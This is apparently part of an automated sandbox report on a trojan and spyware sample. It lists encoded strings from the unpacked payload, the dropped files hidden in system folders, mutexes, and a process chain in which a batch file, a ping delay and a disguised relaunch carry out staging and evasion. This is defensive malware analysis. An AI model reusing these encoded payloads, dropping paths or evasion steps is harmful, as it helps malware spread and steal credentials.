A7KHc6Tvc8KEQ6Rvc0KEG6RHczKPvaMdEk38OgUKtf45baWbs3/Ub+3kNFpN/HQaBM6XTjrtrlocJ7dxheBFEslLm3JJCbsTx4YEFv8J64v4P+9g5dlL7xA1j6c9gqdIO/Y9THDuCKPYRqWjm6AbuAHlZMSAD5Y9rchMoIqwDKZkjdhHYJMfXBAlcONL1w4parvq+DPLwO7Is6H3SSI6Jc4FIFzgLukSRw0aDb8m2HaXovacjYbxjJgRNBcvS7UA3B+zvozXsWhTG8iPfXX7Bqxu/TDwjb/9H1DGOd36Ab076FlewmvTyvfgFGXrhnVWUHghBSmNNnUWoiYBQyQHS4eaMHTqEk8D4kh8v3r7mYcZT3K9qDEMoFRqRGwQTqoRhsgQbVdNll6gw/TXK08Q5TGM3M7G+gWTRcjykBdTp/oAvRxG4RmJPuR3Y/OuBH2yIPq4qCvNmvGbCX6eMf3+Thv7O3GEd2uOCwIQkkCJnKCiFSGmLzAHOA7BIy4woJoQrMia5c6Inmkiuna4LxsTzk/GCDsUybZqCPeX+Uto8nQm+9hCil5y4OZ6pv1PL3N33HgPkI8/iA1hqBKI8IJkCbj3qzQT98EcKRs1fgPyKJOmPSMgjY25TN2fwgSBxI/4o0W6St9rwIG6ikEVeVlEyMgFhA/56Y77IhYUILTM8LKOu+e+DRu6MJxFIifhXt9Dh7HKXmtBiR/0CBxzK2bXQMh3gfG/95DT3Dv5T5EjZPnxoXU8AVccWgU/JeVj9RNJlfqT5zUcfjQBzjbdoxTe2xJ9HcXfVc8HzNJksVEUW/pkyd6YCFLc+dMtz9QmKzPzUUaihlKGnRVoOq//AVTys4VoRfIsBDAgdoDYzY0PmHcis07F5kZV2zke6SFJH+phS0jX8B+exZa7GWjxzUU/2ef1TXMp/yxBrCNnIFnF6HcW6Dgk24ucrOrjsX8YR5l74ouunadvm4kcs7c2Zexa2GiGvqxkBiGl1D4OgSPj1k5mxdYl4jbSkQVWEdFFZpiAGzvx5ukdUZIKLpTKBFGcw7yaoeJ2KJHZcVveT1X6LcuIoTH54mkS3ipvXhWb5HOeKceCglUliA/zrGbwCF23qet91rzQxzoO8QsYCoe/ye7nkiWe+WUnNojbvFJvAFlECMIkSKokVZVwZ27GyOWKoJRW265kVANG6usAFjxrKPCp6UwSAcdUAE5DicKKP6IHBXW713L5AkHZOJFsp79eBsLKEljDBk/73fW70EsSHR48SOpEaOCUP8SCIa5Frgw9PSvkUPxOflos/UysBU065hcmpQo+/EfqQJxKe8pi95MY4AkJ6PJFRgfp5RuO8jnw7BwdzCirF9C6cdyDfzy/OYoyCo09/xvBYzrxvZkmM0bAiyOxKTfzFvd1V+qt+klR4KQGAMX7dXzS9Gqtr6NSOPPELgc0JjKJ10RqoHjuVXUblYj9LX2VoRFARD8C1wUS3eawqC7ArI7ufaWzQ
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 76n.csBase64 encoded string: 'tV/NQx1u/wysWGpIpxhoqHZF3xFruazhj4ri0nGDAqfHfiotTsG9owzN3ppNr+GiWjcSDmboXzHI/Z1/PclUVdIDwUHGFtTNK95vv6LRCETBd8uqv7/32PvscVVXq4njef29i8KdkAIX7hMebo0g919a9+Ejvbnr6XEbS3RedBXrYNomkbRSFzgzvXVEt2V/', '+f/1oVXgbMgidJZEjvJmMXvLaDGvmgot7SAFU6f9z6zuJaazz/1p+N0mxs2YGSyD5eF+I0vtefO7fcJlZSdKRRAQUiNcQ/Qg330kr7T6T5X+8/8Y8NK+ERmjwwSE1gjuQ536i04ZT82d+J6HtV9iiZOiz9ImQFD2GQ/Y7FhRes+u1/6Qer79CkV9Xj9A/mNUhHxVhPoqqK4p6+x1tGUL05fV9VJElwZbzon9l54aCWEsP0zUKlkj7J6Bl1Rdy57c'
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 7YK.csBase64 encoded string: 'jlj2C6Vo9wxlZW3X0Y/rGSuc7vpufqej201XB8PpV6OHQLJMxB9pqWl7elm1IpizYkfv6Z4ZtCENvx4fkmt+dz4KT7rurEa/DC4vJNjY7nC9pmBnj7TTOMkaoH2eZADwzban7Nd9wX5zjaDaseJMG5PtfFGnxt9NNldJqFEUfh+T8MMClrxBcYE/7I5LnLyT7r1LXgJpK26yQdXM230lNSxbUD1z1T/qw999A3BjJxQ6RGZmJND1wdL7cqksRFh8g9AzZSPoQKllxR5OfgFqMlJgUExBztvKKh0nWAmT6LJMwDxg0AW0uJMfUeuaPuy4aW+ZkOKkso/cCp3qb76Na/BYQtccwbQqE0SgjqHS91EQmPIxJCGjTR1vEodY6SkqahvWL0Pa9Uw2hijgEGHSPFDKUzHXDicdp6YW+oK3EI5MIeP6iPOtqCDLUD5WCasnFDuPGoarnheLgdPnK2+cQLHTeJN5T21PujdQY3mDNan/dACX9nQtVd7ZDO1CdK19f5Ih3ELJ3jGjtLdftMeg4vDAnHtC/Nbhrs9yc98qsI0fQeTcYWgLGW5aVZ2/m3HIt2WMkBnL/EKnB/9OfK4Hb6QE9H2zYnq51zM+fGGQAIyHLrQD5suS0CQMyuVz7gM9GTFGYHXWtkqpi4SJNY0A0pCkce3mzRMrhfxq6zMjk13jQkorQUZq1PE20h+cOdg0u91msNhZf1KaFJJmAvt/+s5ke+L1IZyE6xofaOITGrRJsqiTnCh2KS0MWKTh4fRkAmVostVdFGsfa3gkrLOuQz3L8Wf59m8BZxzB2pnYwiAuADE93Ff2oAy6kewuHFKWdlw7dOc1CHoRCGETjpq6WCcaSALafT+ml18vX9+IR6+Luf0qR75uKRXpUCthoGLODBI2d501IdwAxB22imoONqu9GpPFPP8ynZfxnBrv6wBrvzmRYGLPgNnTZfUHH8p8Q/lJBT1P1UfN2HAniB3lP8E7cOdvwHN1fms2DUAkNec5mNF1fH00+c44AgGpFCyg0prHHRMILBhUy5MXkgXxaA==', 'hfpIhvOmfXaAYae3lzPIQ7hfc4slwe8TgywtoJMcgLYd54agz32V4Bek8KqmDn0BZHdknuObnxmEjDjieMv3lmYfUMvedkY2VXDxaz2EobsHYZB4kHI117Zxs7Qb8t7D'
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/281@0/1
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Program Files (x86)\windows nt\Accessories\en-US\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeFile created: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeMutant created: NULL
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\d9644a53c099b8ef069d97c7b0d2f65e85cf0cff3293cfd8bb62590e72fe2bea
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6176
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3b4829c3-284c-4f17-ac8d-6b4b7bda2ef5Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat"
                                Source: KyC6hVwU8Z.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: J203HxjA6A.18.dr, pt44UbVrX8.18.dr, kYz7lzC7Jj.18.dr, 7su0aWjW8w.18.dr, 0GZTZCUY0v.18.dr, pO8Q4T5snJ.18.dr, iwu6keIS7m.18.dr, I2cOwlVbag.18.dr, H6A5OwnMM6.18.dr, ao2NmyHDlD.18.dr, LnYzImVnQ2.18.dr, dCkec23DBT.18.dr, GKuwXuXE8C.18.dr, gtmLr0ymEC.18.dr, PBSk0Zm5Dd.18.dr, nIzUjAqAw2.18.dr, DVgrhhAWZS.18.dr, UP7xlfBkwQ.18.dr, lykS9T1xkn.18.dr, EWwQJHUCrx.18.dr, Utub242wab.18.dr, vNf33pNqgF.18.dr, KqAh4OxcmN.18.dr, sT7v3y8Ay2.18.dr, boRAfOEPDL.18.dr, SVsEb98rBZ.18.dr, vruohWsJk5.18.dr, 6UmKsuDUKz.18.dr, LPGF0xt1DH.18.dr, 9dkq45Ac5a.18.dr, FimG10vvKl.18.dr, WUqhDsmpfm.18.dr, ih02a81obF.18.dr, z14JM0ronL.18.dr, sdRLUSSXm3.18.dr, 9YF0DAxCJR.18.dr, cgTAXxmJGO.18.dr, eSvLqivfpd.18.dr, N1xEUNZmC4.18.dr, i7Bl7x9BQv.18.dr, lkPEUyrGJS.18.dr, V5qcH4vQA7.18.dr, S70rTITpHM.18.dr, akoSdepB0C.18.dr, 4FOwrtRIJg.18.dr, ABrC2EDZTj.18.dr, ZKbQ74hJMK.18.dr, cEZtl8Q1fy.18.dr, wVzAcLzeb4.18.dr, 69PBq723DI.18.dr, 9Bsflhm0fO.18.dr, q7Yak2ugVm.18.dr, pjvV2RxjYa.18.dr, t7ofdTq1xz.18.dr, QiQMIefFnD.18.dr, 4LcM8naUSb.18.dr, qte18p81kf.18.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: KyC6hVwU8Z.exeReversingLabs: Detection: 71%
                                Source: KyC6hVwU8Z.exeVirustotal: Detection: 50%
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeFile read: C:\Users\user\Desktop\KyC6hVwU8Z.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 268
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe "C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe"
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe "C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe"
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe "C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe"
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe "C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe "C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe "C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: mmdevapi.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ksuser.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: avrt.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: audioses.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: midimap.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\f6900929d627b7Jump to behavior
                                Source: KyC6hVwU8Z.exeStatic file information: File size 1341440 > 1048576
                                Source: KyC6hVwU8Z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: mountvol.pdb source: KyC6hVwU8Z.exe, KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 7Up9zvGH4w.exe, 0000000A.00000000.2793610313.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe, 0000000A.00000002.2796201070.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe.6.dr
